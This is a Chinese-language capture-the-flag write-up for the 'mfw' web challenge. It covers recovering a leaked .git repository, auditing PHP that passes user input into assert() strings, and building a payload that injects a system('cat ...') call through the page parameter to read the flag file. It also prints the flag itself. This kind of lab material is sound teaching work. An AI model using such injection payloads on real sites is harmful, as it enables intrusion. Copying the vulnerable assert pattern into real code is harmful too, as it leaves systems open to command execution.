攻防世界：mfw[WriteUP]

根据题目提示考虑是git库泄露

这里在地址栏后加.git也可以验证是git库泄露

---

使用GitHack工具对git库进行恢复重建

 

在templates目录下存在flag.php文件，但里面并没有flag

有内容的只有主目录下的index.php

 

index.php源码：

<?phpif (isset($_GET['page'])) {$page = $_GET['page'];
} else {$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");?>
<!DOCTYPE html>
<html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>My PHP Website</title><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" /></head><body><nav class="navbar navbar-inverse navbar-fixed-top"><div class="container"><div class="navbar-header"><button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="navbar-brand" href="#">Project name</a></div><div id="navbar" class="collapse navbar-collapse"><ul class="nav navbar-nav"><li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li><li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li><li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li><!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> --></ul></div></div></nav><div class="container" style="margin-top: 50px"><?phprequire_once $file;?></div><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" /><script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" /></body>
</html>

提取需要审计的PHP代码

代码审计：

<?phpif (isset($_GET['page'])) {    //判断$page是否存在$page = $_GET['page'];    //存在就以get方法取值
} else {$page = "home";    //不存在就将"home"赋值给新建$page
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
//assert函数返回值如果不为true则执行die命令则PHP脚本终止运行
//所以我们可以构造一个$file使其直接执行系统命令并加上注释符把判断".."的部分注释掉并即可// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
//判断$file文件是否存在，不存在直接终止脚本?>

其中有一串关键代码：$file = "templates/" . $page . ".php";

我们通过前面的GitHack已知悉flag.php文件就在templates目录下

所以我们构造payload的时候使$page有cat flag.php命令就行

---

重点：assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

首先使strpos函数闭合，利用函数结构strpost('，那么$file的前半部分应该是：')

后面接上命令： or system('cat templates/flag.php')，再接上注释符：//

如此这般，该条代码最后执行的效果应该是：【绿色部分被//注释】

assert("strpos('') or system('cat templates/flag.php');//', '..') === false") or die("Detected hacking attempt!");

strpost('')参数为空时返回false，所以直接执行or后面的代码

最后构造payload：URL/?page=') or system('cat templates/flag.php');//

---

flag：cyberpeace{a97ae1229c2668130daa2f0f432fdd1b}